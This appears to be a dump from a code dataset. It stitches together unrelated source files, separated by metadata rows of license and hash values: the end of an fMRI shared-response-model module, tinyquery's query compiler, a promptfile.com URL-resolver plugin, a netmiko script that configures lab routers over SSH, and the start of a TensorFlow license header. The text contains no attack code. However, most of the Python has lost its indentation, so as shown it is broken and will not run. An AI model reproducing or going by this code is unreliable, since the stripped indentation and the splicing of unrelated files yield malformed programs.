f2 = constf2 * T.sum(
log_p_y_given_x[T.arange(lr_samples_S), labels_S])
f = f1 + f2
else:
f = f1
# Define the problem and solve
f_subject = self._objective_function_subject(data_align[subject],
data_sup[subject],
labels[subject],
w[subject],
s, theta, bias)
minstep = np.amin(((10**-np.floor(np.log10(f_subject))), 1e-1))
manifold = Stiefel(w[subject].shape[0], w[subject].shape[1])
problem = Problem(manifold=manifold, cost=f, arg=w_th, verbosity=0)
solver = ConjugateGradient(mingradnorm=1e-2, minstepsize=minstep)
w[subject] = np.array(solver.solve(
problem, x=w[subject].astype(theano.config.floatX)))
if data_sup[subject] is not None:
del f2
del log_p_y_given_x
del data_sup_subject
del labels_S
del solver
del problem
del manifold
del f
del f1
del data_srm_subject
del w_th
del theta_th
del bias_th
del s_th
# Run garbage collector to avoid filling up the memory
gc.collect()
return w
@staticmethod
def _compute_shared_response(data, w):
""" Compute the shared response S
Parameters
----------
data : list of 2D arrays, element i has shape=[voxels_i, samples]
Each element in the list contains the fMRI data of one subject.
w : list of 2D arrays, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
Returns
-------
s : array, shape=[features, samples]
The shared response for the subjects data with the mappings in w.
"""
s = np.zeros((w[0].shape[1], data[0].shape[1]))
for m in range(len(w)):
s = s + w[m].T.dot(data[m])
s /= len(w)
return s
def _objective_function(self, data_align, data_sup, labels, w, s, theta,
bias):
"""Compute the objective function of the Semi-Supervised SRM
See :eq:`sssrm-eq`.
Parameters
----------
data_align : list of 2D arrays, element i has shape=[voxels_i, n_align]
Each element in the list contains the fMRI data for alignment of
one subject. There are n_align samples for each subject.
data_sup : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in data_sup.
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
s : array, shape=[features, samples]
The shared response.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
f_val : float
The SS-SRM objective function evaluated based on the parameters to
this function.
"""
subjects = len(data_align)
# Compute the SRM loss
f_val = 0.0
for subject in range(subjects):
samples = data_align[subject].shape[1]
f_val += (1 - self.alpha) * (0.5 / samples) \
* np.linalg.norm(data_align[subject] - w[subject].dot(s),
'fro')**2
# Compute the MLR loss
f_val += self._loss_lr(data_sup, labels, w, theta, bias)
return f_val
def _objective_function_subject(self, data_align, data_sup, labels, w, s,
theta, bias):
"""Compute the objective function for one subject.
        .. math::
            (1-\\alpha) Loss_{SRM_i}(W_i,S;X_i)
            + \\alpha/\\gamma Loss_{MLR_i}(\\theta, bias; \\{(W_i^T \\times Z_i, y_i)\\})
            + R(\\theta)
Parameters
----------
data_align : 2D array, shape=[voxels_i, samples_align]
Contains the fMRI data for alignment of subject i.
data_sup : 2D array, shape=[voxels_i, samples_i]
Contains the fMRI data of one subject for the classification task.
labels : array of int, shape=[samples_i]
The labels for the data samples in data_sup.
w : array, shape=[voxels_i, features]
The orthogonal transform (mapping) :math:`W_i` for subject i.
s : array, shape=[features, samples]
The shared response.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
f_val : float
The SS-SRM objective function for subject i evaluated on the
parameters to this function.
"""
# Compute the SRM loss
f_val = 0.0
samples = data_align.shape[1]
f_val += (1 - self.alpha) * (0.5 / samples) \
* np.linalg.norm(data_align - w.dot(s), 'fro')**2
# Compute the MLR loss
f_val += self._loss_lr_subject(data_sup, labels, w, theta, bias)
return f_val
def _loss_lr_subject(self, data, labels, w, theta, bias):
"""Compute the Loss MLR for a single subject (without regularization)
Parameters
----------
data : array, shape=[voxels, samples]
The fMRI data of subject i for the classification task.
labels : array of int, shape=[samples]
The labels for the data samples in data.
w : array, shape=[voxels, features]
The orthogonal transform (mapping) :math:`W_i` for subject i.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
loss : float
The loss MLR for the subject
"""
if data is None:
return 0.0
samples = data.shape[1]
thetaT_wi_zi_plus_bias = theta.T.dot(w.T.dot(data)) + bias
sum_exp, max_value, _ = utils.sumexp_stable(thetaT_wi_zi_plus_bias)
sum_exp_values = np.log(sum_exp) + max_value
aux = 0.0
for sample in range(samples):
label = labels[sample]
aux += thetaT_wi_zi_plus_bias[label, sample]
return self.alpha / samples / self.gamma * (sum_exp_values.sum() - aux)
def _loss_lr(self, data, labels, w, theta, bias):
"""Compute the Loss MLR (with the regularization)
Parameters
----------
data : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the samples in
data.
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
loss : float
The loss MLR for the SS-SRM model
"""
subjects = len(data)
loss = 0.0
for subject in range(subjects):
if labels[subject] is not None:
loss += self._loss_lr_subject(data[subject], labels[subject],
w[subject], theta, bias)
return loss + 0.5 * np.linalg.norm(theta, 'fro')**2
@staticmethod
def _stack_list(data, data_labels, w):
"""Construct a numpy array by stacking arrays in a list
        Parameters
----------
data : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
data_labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the samples in
data.
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
Returns
-------
data_stacked : 2D array, shape=[samples, features]
The data samples from all subjects are stacked into a single
2D array, where "samples" is the sum of samples_i.
labels_stacked : array, shape=[samples,]
The labels from all subjects are stacked into a single
array, where "samples" is the sum of samples_i.
weights : array, shape=[samples,]
The number of samples of the subject that are related to that
sample. They become a weight per sample in the MLR loss.
"""
labels_stacked = utils.concatenate_not_none(data_labels)
weights = np.empty((labels_stacked.size,))
data_shared = [None] * len(data)
curr_samples = 0
for s in range(len(data)):
if data[s] is not None:
subject_samples = data[s].shape[1]
curr_samples_end = curr_samples + subject_samples
weights[curr_samples:curr_samples_end] = subject_samples
data_shared[s] = w[s].T.dot(data[s])
curr_samples += data[s].shape[1]
data_stacked = utils.concatenate_not_none(data_shared, axis=1).T
return data_stacked, labels_stacked, weights
| apache-2.0 | -7,022,321,390,158,036,000 | 34.77845 | 79 | 0.571854 | false |
Khan/tinyquery | tinyquery/compiler.py | 1 | 29283 | """The compiler step turns an AST into a planned query.
This step has a number of responsibilities:
-Validate that the expression is well-typed.
-Resolve all select fields to their aliases and types.
"""
from __future__ import absolute_import
import collections
import itertools
from tinyquery import exceptions
from tinyquery import parser
from tinyquery import runtime
from tinyquery import tq_ast
from tinyquery import typed_ast
from tinyquery import type_context
from tinyquery import tq_types
def compile_text(text, tables_by_name):
ast = parser.parse_text(text)
return Compiler(tables_by_name).compile_select(ast)
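# Usage sketch (hypothetical table objects): compile_text(
#     'SELECT foo FROM my_table', {'my_table': my_table})
# parses the query and returns a typed_ast.Select with aliases and types
# resolved against the supplied tables.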
class Compiler(object):
def __init__(self, tables_by_name):
self.tables_by_name = tables_by_name
def compile_select(self, select):
assert isinstance(select, tq_ast.Select)
table_expr = self.compile_table_expr(select.table_expr)
table_ctx = table_expr.type_ctx
where_expr = self.compile_filter_expr(select.where_expr, table_ctx)
select_fields = self.expand_select_fields(select.select_fields,
table_expr)
aliases = self.get_aliases(select_fields)
within_clauses = self.get_within_clauses(select_fields)
group_set = self.compile_groups(select.groups, select_fields, aliases,
table_ctx)
compiled_field_dict, aggregate_context = self.compile_group_fields(
select_fields, aliases, within_clauses, group_set, table_ctx)
is_scoped_aggregation = any(
clause is not None for clause in within_clauses)
# Implicit columns can only show up in non-aggregate select fields.
implicit_column_context = self.find_used_column_context(
compiled_field_dict.values())
for alias, within_clause, select_field in zip(aliases, within_clauses,
select_fields):
if group_set is not None and alias not in group_set.alias_groups:
if is_scoped_aggregation is False:
compiled_field_dict[alias] = self.compile_select_field(
select_field.expr, alias, within_clause,
aggregate_context)
else:
aggregate_context_not_within = (
aggregate_context.aggregate_context)
if select_field.within_record is not None:
compiled_field_dict[alias] = self.compile_select_field(
select_field.expr, alias, within_clause,
aggregate_context)
else:
compiled_field_dict[alias] = self.compile_select_field(
select_field.expr, alias, within_clause,
aggregate_context_not_within)
# Put the compiled select fields in the proper order.
select_fields = [compiled_field_dict[alias] for alias in aliases]
result_context = type_context.TypeContext.from_table_and_columns(
None,
collections.OrderedDict(
(field.alias, field.expr.type) for field in select_fields),
implicit_column_context=implicit_column_context)
having_expr = self.compile_filter_expr(select.having_expr,
result_context)
return typed_ast.Select(select_fields, table_expr, where_expr,
group_set, having_expr, select.orderings,
select.limit, result_context)
def expand_select_fields(self, select_fields, table_expr):
"""Expand any stars into a list of all context columns.
Arguments:
select_fields: A list of uncompiled select fields, some of which
can be tq_ast.Star.
table_expr: The compiled table expression to reference, if
necessary.
"""
table_ctx = table_expr.type_ctx
star_select_fields = []
for table_name, col_name in table_ctx.columns:
if table_name is not None:
col_ref = table_name + '.' + col_name
else:
col_ref = col_name
# Joins are special: the aliases default to a fully-qualified name.
if isinstance(table_expr, typed_ast.Join):
alias = table_name + '.' + col_name
else:
alias = col_name
star_select_fields.append(
tq_ast.SelectField(tq_ast.ColumnId(col_ref), alias, None))
result_fields = []
for field in select_fields:
if isinstance(field, tq_ast.Star):
result_fields.extend(star_select_fields)
elif (field.expr and isinstance(field.expr, tq_ast.ColumnId) and
field.expr.name.endswith('.*')):
prefix = field.expr.name[:-len('.*')]
record_star_fields = [f
for f in star_select_fields
if f.alias.startswith(prefix)]
result_fields.extend(record_star_fields)
else:
result_fields.append(field)
return result_fields
def compile_group_fields(self, select_fields, aliases, within_clauses,
group_set, table_ctx):
"""Compile grouped select fields and compute a type context to use.
Arguments:
select_fields: A list of uncompiled select fields.
aliases: A list of aliases that matches with select_fields.
within_clauses: A list of within clause expression corresponding
to the select_fields.
group_set: A GroupSet for the groups to use.
table_ctx: A type context for the table being selected.
Returns:
compiled_field_dict: An OrderedDict from alias to compiled select
field for the grouped-by select fields. We use an OrderedDict
so the order is predictable to make testing easier.
aggregate_context: A type context that can be used when evaluating
aggregate select fields.
"""
compiled_field_dict = collections.OrderedDict()
group_columns = collections.OrderedDict()
if group_set is not None:
for field_group in group_set.field_groups:
group_columns[
(field_group.table, field_group.column)] = field_group.type
for alias, within_clause, select_field in zip(aliases, within_clauses,
select_fields):
if group_set is None or alias in group_set.alias_groups:
compiled_field_dict[alias] = self.compile_select_field(
select_field.expr, alias, within_clause, table_ctx)
group_columns[
(None, alias)] = compiled_field_dict[alias].expr.type
aggregate_context = type_context.TypeContext.from_full_columns(
group_columns, aggregate_context=table_ctx)
return compiled_field_dict, aggregate_context
def find_used_column_context(self, select_field_list):
"""Given a list of compiled SelectFields, find the used columns.
The return value is a TypeContext for the columns accessed, so that
these columns can be used in outer selects, but at lower precedence
than normal select fields.
This may also be used in the future to determine which fields to
actually take from the table.
"""
column_references = collections.OrderedDict()
for select_field in select_field_list:
column_references.update(
self.find_column_references(select_field.expr))
return type_context.TypeContext.from_full_columns(column_references)
def find_column_references(self, expr):
"""Return an OrderedDict of (table, column) -> type."""
if (isinstance(expr, typed_ast.FunctionCall) or
isinstance(expr, typed_ast.AggregateFunctionCall)):
result = collections.OrderedDict()
for arg in expr.args:
result.update(self.find_column_references(arg))
return result
elif isinstance(expr, typed_ast.ColumnRef):
return collections.OrderedDict(
[((expr.table, expr.column), expr.type)])
elif isinstance(expr, typed_ast.Literal):
return collections.OrderedDict()
else:
assert False, 'Unexpected type: %s' % type(expr)
def compile_table_expr(self, table_expr):
"""Compile a table expression and determine its result type context.
Arguments:
            table_expr: Either None (indicating that there is no table being
                selected) or a TableId.
Returns: A typed_ast.TableExpression.
"""
if table_expr is None:
return typed_ast.NoTable()
else:
try:
method = getattr(self, 'compile_table_expr_' +
table_expr.__class__.__name__)
except AttributeError:
raise NotImplementedError('Missing handler for type {}'.format(
table_expr.__class__.__name__
))
return method(table_expr)
def compile_table_expr_TableId(self, table_expr):
from tinyquery import tinyquery # TODO(colin): fix circular import
table = self.tables_by_name[table_expr.name]
if isinstance(table, tinyquery.Table):
return self.compile_table_ref(table_expr, table)
elif isinstance(table, tinyquery.View):
return self.compile_view_ref(table_expr, table)
else:
raise NotImplementedError('Unknown table type %s.' % type(table))
def compile_table_ref(self, table_expr, table):
alias = table_expr.alias or table_expr.name
columns = collections.OrderedDict([
(name, column.type) for name, column in table.columns.items()
])
type_ctx = type_context.TypeContext.from_table_and_columns(
alias, columns, None)
return typed_ast.Table(table_expr.name, type_ctx)
def compile_view_ref(self, table_expr, view):
# TODO(alan): This code allows fields from the view's implicit column
# context to be selected, which probably isn't allowed in regular
# BigQuery.
# TODO(alan): We should check for cycles when evaluating views.
# Otherwise, circular views will cause an infinite loop.
# The view keeps its query as regular text, so we need to lex and parse
# it, then include it as if it was a subquery. It's almost correct to
# re-use the subquery compiling code, except that subquery aliases have
# special semantics that we don't want to use; an alias on a view
# should count for all returned fields.
alias = table_expr.alias or table_expr.name
uncompiled_view_ast = parser.parse_text(view.query)
compiled_view_select = self.compile_select(uncompiled_view_ast)
# We always want to apply either the alias or the full table name to
# the returned type context.
new_type_context = (
compiled_view_select.type_ctx.context_with_full_alias(alias))
return compiled_view_select.with_type_ctx(new_type_context)
def compile_table_expr_TableUnion(self, table_expr):
compiled_tables = [
self.compile_table_expr(table) for table in table_expr.tables]
type_ctx = type_context.TypeContext.union_contexts(
table.type_ctx for table in compiled_tables)
return typed_ast.TableUnion(compiled_tables, type_ctx)
def compile_table_expr_Join(self, table_expr):
table_expressions = itertools.chain(
[table_expr.base],
(join_part.table_expr for join_part in table_expr.join_parts)
)
compiled_result = [self.compile_joined_table(x)
for x in table_expressions]
compiled_table_exprs, compiled_aliases = zip(*compiled_result)
type_contexts = [compiled_table.type_ctx
for compiled_table in compiled_table_exprs]
result_fields = self.compile_join_fields(
type_contexts,
compiled_aliases,
[join_part.condition for join_part in table_expr.join_parts],
[join_part.join_type for join_part in table_expr.join_parts]
)
result_type_ctx = type_context.TypeContext.join_contexts(
type_contexts)
return typed_ast.Join(
base=compiled_table_exprs[0],
# wrapping in list() for python 3 support (shouldn't be a
# large number of items so performance impact should be
# minimal)
tables=list(zip(compiled_table_exprs[1:],
(join_part.join_type
for join_part in table_expr.join_parts))),
conditions=result_fields,
type_ctx=result_type_ctx)
def compile_joined_table(self, table_expr):
"""Given one side of a JOIN, get its table expression and alias."""
compiled_table = self.compile_table_expr(table_expr)
if table_expr.alias is not None:
alias = table_expr.alias
elif isinstance(table_expr, tq_ast.TableId):
alias = table_expr.name
else:
raise exceptions.CompileError(
'Table expression must have an alias name.')
result_ctx = compiled_table.type_ctx.context_with_full_alias(alias)
compiled_table = compiled_table.with_type_ctx(result_ctx)
return compiled_table, alias
def compile_join_fields(self, type_contexts, aliases, conditions,
join_types):
"""Traverse a join condition to find the joined fields.
Arguments:
type_contexts: a list of TypeContexts for the tables being
joined.
aliases: a list of aliases for the tables being joined.
            conditions: a list of instances of tq_ast.BinaryOperator
expressing the condition on which each table is being joined.
join_types: a list of instances of tq_ast.JoinType corresponding to
the type of each join
Returns: A list of JoinFields instances for the expression.
TODO(colin): is this where we should check that the conditions are
sufficient for joining all the tables?
"""
def compile_join_field(expr, join_type):
"""Compile a single part of the join.
This results in a list of one or more join fields, depending on
whether or not multiple are ANDed together.
"""
if join_type is tq_ast.JoinType.CROSS:
assert expr is None, (
"Cross joins do not allow join conditions.")
return [None]
if isinstance(expr, tq_ast.BinaryOperator):
if expr.operator == 'and':
return list(itertools.chain(
compile_join_field(expr.left, join_type),
compile_join_field(expr.right, join_type)))
elif (expr.operator in ('=', '==') and
isinstance(expr.left, tq_ast.ColumnId) and
isinstance(expr.right, tq_ast.ColumnId)):
# For evaluation, we want the ordering of the columns in
# the JoinField to match the ordering of the join, left to
# right, but bigquery allows either order. Thus we need to
# reorder them if they're reversed.
# TODO(colin): better error message if we don't find an
# alias?
lhs_alias_idx = next(
idx
for idx, alias in enumerate(aliases)
if expr.left.name.startswith(alias + ".")
)
rhs_alias_idx = next(
idx
for idx, alias in enumerate(aliases)
if expr.right.name.startswith(alias + ".")
)
left_column_id = self.compile_ColumnId(
expr.left,
type_contexts[lhs_alias_idx])
right_column_id = self.compile_ColumnId(
expr.right,
type_contexts[rhs_alias_idx])
if lhs_alias_idx < rhs_alias_idx:
return [typed_ast.JoinFields(left_column_id,
right_column_id)]
elif rhs_alias_idx < lhs_alias_idx:
return [typed_ast.JoinFields(right_column_id,
left_column_id)]
# Fall through to the error case if the aliases are the
# same for both sides.
raise exceptions.CompileError(
'JOIN conditions must consist of an AND of = '
                'comparisons between two fields on distinct '
'tables. Got expression %s' % expr)
return [compile_join_field(expr, join_type)
for expr, join_type in zip(conditions, join_types)]
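    # Illustrative example (assumed query, not from the original source): for
    # "t1 JOIN t2 ON t1.id = t2.id AND t1.k = t2.k" this returns one list per
    # join part; that single part's list holds a JoinFields entry for each of
    # the two ANDed equalities, while a CROSS JOIN part yields [None].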
def compile_table_expr_Select(self, table_expr):
select_result = self.compile_select(table_expr)
if table_expr.alias is not None:
new_type_context = (select_result.type_ctx.
context_with_subquery_alias(table_expr.alias))
select_result = select_result.with_type_ctx(new_type_context)
return select_result
def compile_groups(self, groups, select_fields, aliases, table_ctx):
"""Gets the group set to use for the query.
This involves handling the special cases when no GROUP BY statement
exists, and also determining whether each group should be treated as an
alias group or a field group.
Arguments:
groups: Either None, indicating that no GROUP BY was specified, or
a list of strings from the GROUP BY.
select_fields: A list of tq_ast.SelectField objects for the query
we are compiling.
aliases: The aliases we will assign to the select fields.
table_ctx: The TypeContext from the table expression in the SELECT.
"""
if groups is None:
# Special case: if no GROUP BY was specified, we're an aggregate
# query iff at least one select field has an aggregate function.
is_aggregate_select = any(
self.expression_contains_aggregate(field.expr)
for field in select_fields)
if is_aggregate_select:
# Group such that everything is in the same group.
return typed_ast.TRIVIAL_GROUP_SET
else:
# Don't do any grouping at all.
return None
else:
# At least one group was specified, so this is definitely a
# GROUP BY query and we need to figure out what they refer to.
alias_groups = set()
field_groups = []
alias_set = set(aliases)
for group in groups:
if group.name in alias_set:
alias_groups.add(group.name)
else:
# Will raise an exception if not found.
# TODO: This doesn't perfectly match BigQuery's approach.
# In BigQuery, grouping by my_table.my_value will make
# either my_table.my_value or my_value valid ways of
# referring to the group, whereas grouping by my_value will
# make it so only my_value is a valid way of referring to
# the group. The whole approach to implicit table
# references could potentially be rethought.
field_groups.append(
table_ctx.column_ref_for_name(group.name))
return typed_ast.GroupSet(alias_groups, field_groups)
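    # Illustrative example (assumed query, not from the original source): in
    # "SELECT value, COUNT(*) AS c FROM t GROUP BY value, other_col", 'value'
    # matches a select alias and becomes an alias group, while 'other_col' is
    # resolved against the table context and becomes a field group.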
def compile_select_field(self, expr, alias, within_clause, type_ctx):
if within_clause is not None and within_clause != 'RECORD' and (
expr.args[0].name.split('.')[0] != within_clause):
raise exceptions.CompileError('WITHIN clause syntax error')
else:
compiled_expr = self.compile_expr(expr, type_ctx)
return typed_ast.SelectField(compiled_expr, alias, within_clause)
def compile_filter_expr(self, filter_expr, table_ctx):
"""If there is a WHERE or HAVING expression, compile it.
If the filter expression is missing, we just use the literal true.
"""
if filter_expr:
return self.compile_expr(filter_expr, table_ctx)
else:
return typed_ast.Literal(True, tq_types.BOOL)
def compile_expr(self, expr, type_ctx):
try:
method = getattr(self, 'compile_' + expr.__class__.__name__)
except AttributeError:
raise NotImplementedError(
'Missing handler for type {}'.format(expr.__class__.__name__))
return method(expr, type_ctx)
def compile_ColumnId(self, expr, type_ctx):
return type_ctx.column_ref_for_name(expr.name)
def compile_Literal(self, expr, type_ctx):
if isinstance(expr.value, bool):
return typed_ast.Literal(expr.value, tq_types.BOOL)
if isinstance(expr.value, int):
return typed_ast.Literal(expr.value, tq_types.INT)
if isinstance(expr.value, float):
return typed_ast.Literal(expr.value, tq_types.FLOAT)
elif isinstance(expr.value, tq_types.STRING_TYPE):
return typed_ast.Literal(expr.value, tq_types.STRING)
elif expr.value is None:
return typed_ast.Literal(expr.value, tq_types.NONETYPE)
else:
raise NotImplementedError('Unrecognized type: {}'.format(
type(expr.value)))
# TODO(Samantha): Don't pass the type, just pass the column so that mode is
# included.
def compile_UnaryOperator(self, expr, type_ctx):
func = runtime.get_unary_op(expr.operator)
compiled_val = self.compile_expr(expr.expr, type_ctx)
try:
result_type = func.check_types(compiled_val.type)
except TypeError:
raise exceptions.CompileError(
'Invalid type for operator {}: {}'.format(
expr.operator, [compiled_val.type]))
return typed_ast.FunctionCall(func, [compiled_val], result_type)
# TODO(Samantha): Don't pass the type, just pass the column so that mode is
# included.
def compile_BinaryOperator(self, expr, type_ctx):
func = runtime.get_binary_op(expr.operator)
compiled_left = self.compile_expr(expr.left, type_ctx)
compiled_right = self.compile_expr(expr.right, type_ctx)
try:
result_type = func.check_types(compiled_left.type,
compiled_right.type)
except TypeError:
raise exceptions.CompileError(
'Invalid types for operator {}: {}'.format(
expr.operator, [arg.type for arg in [compiled_left,
compiled_right]]))
return typed_ast.FunctionCall(
func, [compiled_left, compiled_right], result_type)
# TODO(Samantha): Don't pass the type, just pass the column so that mode is
# included.
def compile_FunctionCall(self, expr, type_ctx):
# Innermost aggregates are special, since the context to use changes
# inside them. We also need to generate an AggregateFunctionCall AST so
# that the evaluator knows to change the context.
if self.is_innermost_aggregate(expr):
if type_ctx.aggregate_context is None:
raise exceptions.CompileError('Unexpected aggregate function.')
sub_expr_ctx = type_ctx.aggregate_context
ast_type = typed_ast.AggregateFunctionCall
else:
sub_expr_ctx = type_ctx
ast_type = typed_ast.FunctionCall
func = runtime.get_func(expr.name)
compiled_args = [self.compile_expr(sub_expr, sub_expr_ctx)
for sub_expr in expr.args]
try:
result_type = func.check_types(
*(arg.type for arg in compiled_args))
except TypeError:
raise exceptions.CompileError(
'Invalid types for function {}: {}'.format(
expr.name, [arg.type for arg in compiled_args]))
return ast_type(func, compiled_args, result_type)
def compile_CaseExpression(self, expr, type_ctx):
"""Compile a CASE expression by converting to nested IF calls."""
def compile_helper(remaining_clauses):
if len(remaining_clauses) == 0:
return tq_ast.Literal(value=None)
clause = remaining_clauses[0]
return tq_ast.FunctionCall(
name='if',
args=[clause.condition,
clause.result_expr,
compile_helper(remaining_clauses[1:])])
case_as_nested_if = compile_helper(expr.clauses)
return self.compile_FunctionCall(case_as_nested_if, type_ctx)
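    # Illustrative sketch (assumed query fragment, not from the original
    # source): "CASE WHEN x THEN a WHEN y THEN b END" is rewritten above to
    # the equivalent nested call if(x, a, if(y, b, NULL)) and then compiled
    # as an ordinary function call.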
@classmethod
def get_aliases(cls, select_field_list):
"""Given a list of tq_ast.SelectField, return the aliases to use."""
used_aliases = set()
proposed_aliases = [cls.field_alias(select_field)
for select_field in select_field_list]
for alias in proposed_aliases:
if alias is not None:
if alias in used_aliases:
raise exceptions.CompileError(
'Ambiguous column name {}.'.format(alias))
used_aliases.add(alias)
generic_field_num = 0
result = []
for alias in proposed_aliases:
if alias is not None:
result.append(alias)
else:
while ('f%s_' % generic_field_num) in used_aliases:
generic_field_num += 1
result.append('f%s_' % generic_field_num)
generic_field_num += 1
return result
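    # Illustrative example (assumed select list, not from the original
    # source): for "SELECT foo, bar + 1, baz AS b" the proposed aliases are
    # ['foo', None, 'b'], so the unnamed expression gets the next unused
    # generic name and the returned list is ['foo', 'f0_', 'b'].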
@classmethod
def get_within_clauses(cls, select_field_list):
return [select_field.within_record
for select_field in select_field_list]
@staticmethod
def field_alias(select_field):
"""Gets the alias to use, or None if it's not specified."""
if select_field.alias is not None:
return select_field.alias
if isinstance(select_field.expr, tq_ast.ColumnId):
return select_field.expr.name
return None
@classmethod
def expression_contains_aggregate(cls, expr):
"""Given a tq_ast expression, check if it does any aggregation.
We need to operate on an uncompiled AST here since we use this
information to figure out how to compile these expressions.
"""
if isinstance(expr, tq_ast.UnaryOperator):
return cls.expression_contains_aggregate(expr.expr)
elif isinstance(expr, tq_ast.BinaryOperator):
return (cls.expression_contains_aggregate(expr.left) or
cls.expression_contains_aggregate(expr.right))
elif isinstance(expr, tq_ast.FunctionCall):
return (runtime.is_aggregate_func(expr.name) or
any(cls.expression_contains_aggregate(arg)
for arg in expr.args))
elif isinstance(expr, tq_ast.CaseExpression):
return False
elif isinstance(expr, tq_ast.Literal):
return False
elif isinstance(expr, tq_ast.ColumnId):
return False
else:
assert False, 'Unexpected expression type: %s' % (
expr.__class__.__name__)
@classmethod
def is_innermost_aggregate(cls, expr):
"""Return True if the given expression is an innermost aggregate.
Only arguments to innermost aggregates actually have access to fields
from the original table expression, so we need to detect this case
specifically.
You might think that repeatedly calling this function while traversing
the tree takes quadratic time in the size of the tree, but it actually
only takes linear time overall. There's a nice proof of this fact,
        which this docstring is too small to contain.
"""
return (isinstance(expr, tq_ast.FunctionCall) and
runtime.is_aggregate_func(expr.name) and
not any(cls.expression_contains_aggregate(sub_expr)
for sub_expr in expr.args))
| mit | -3,294,859,790,084,400,000 | 44.826291 | 79 | 0.58464 | false |
Lynx187/script.module.urlresolver | lib/urlresolver/plugins/promptfile.py | 3 | 2319 | '''
urlresolver XBMC Addon
Copyright (C) 2013 Bstrdsmkr
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from t0mm0.common.net import Net
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
from urlresolver import common
class PromptfileResolver(Plugin, UrlResolver, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "promptfile"
domains = ["promptfile.com"]
def __init__(self):
p = self.get_setting('priority') or 100
self.priority = int(p)
self.net = Net()
self.pattern = '//((?:www.)?promptfile.com)/(?:l|e)/([0-9A-Za-z\-]+)'
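        # Illustrative example (hypothetical URL, not from the original
        # source): 'http://www.promptfile.com/e/ABC123' matches this pattern
        # with group(1) == 'www.promptfile.com' and group(2) == 'ABC123',
        # the (host, media_id) pair returned by get_host_and_id().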
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
html = self.net.http_GET(web_url).content
data = {}
r = re.findall(r'type="hidden"\s*name="(.+?)"\s*value="(.*?)"', html)
for name, value in r:
data[name] = value
html = self.net.http_POST(web_url, data).content
html = re.compile(r'clip\s*:\s*\{.*?url\s*:\s*[\"\'](.+?)[\"\']', re.DOTALL).search(html)
if not html:
raise UrlResolver.ResolverError('File Not Found or removed')
stream_url = html.group(1)
return stream_url
def get_url(self, host, media_id):
return 'http://www.promptfile.com/e/%s' % (media_id)
def get_host_and_id(self, url):
r = re.search(self.pattern, url)
if r:
return r.groups()
else:
return False
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
return re.search(self.pattern, url) or 'promptfile' in host
| gpl-2.0 | 4,043,755,656,440,541,700 | 36.403226 | 97 | 0.65718 | false |
msifuentes/pynet_ansible | test_python/netmiko_wk4_ex7.py | 2 | 1955 | #!/usr/bin/env python
#Import libraries
from netmiko import ConnectHandler
from getpass import getpass
#define variables for the connection to network devices
ip_addr = '50.76.53.27'
username = 'pyclass'
password = getpass()
portpy2 = 8022
portsrx = 9822
cisco = 'cisco_ios'
juniper = 'juniper'
#create a dictionary of the devices you are going to make a connection with
pynetrtr1 = {
'device_type': cisco,
'ip': ip_addr,
'username': username,
'password': password,
}
pynetrtr2 = {
'device_type': cisco,
'ip': ip_addr,
'username': username,
'password': password,
'port': portpy2,
}
juniper_srx = {
'device_type': juniper,
'ip': ip_addr,
'username': username,
'password': password,
'secret': '',
'port': portsrx,
}
#This tests that the mapping of the dictionary to the variables is working
# print pynetrtr1
print pynetrtr2
# print juniper_srx
#This makes the connection to the network devices defined.
#the ** is used to help pass all the dictionary information along
# rtr1 = ConnectHandler(**pynetrtr1)
rtr2 = ConnectHandler(**pynetrtr2)
# srx = ConnectHandler(**juniper_srx)
#this output will confirm that the connection was made with netmiko and the ssh information used to make the connection
# print rtr1
print rtr2
# print srx
#this will place rtr2 into config mode and will display the output to confirm we are in that mode.
rtr2.config_mode()
outp_show = rtr2.find_prompt()
print outp_show
#then we will set the logging buffer to 11100
rtr2.send_command("logging buffer 11100")
rtr2.exit_config_mode()
outp_show = rtr2.send_command("show run | i logging")
print outp_show
#this closes the connection. Without this command the connection stays open until the vty idle timer kicks in.
# rtr1.disconnect()
rtr2.disconnect()
#On the srx the connection is not a clean disconnect. The connection from the server sits in fin_wait
# srx.disconnect()
| apache-2.0 | -7,625,436,891,656,848,000 | 24.38961 | 119 | 0.717136 | false |
AsimmHirani/ISpyPi | tensorflow/contrib/tensorflow-master/tensorflow/contrib/learn/python/learn/learn_io/pandas_io.py | 4 | 6562 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
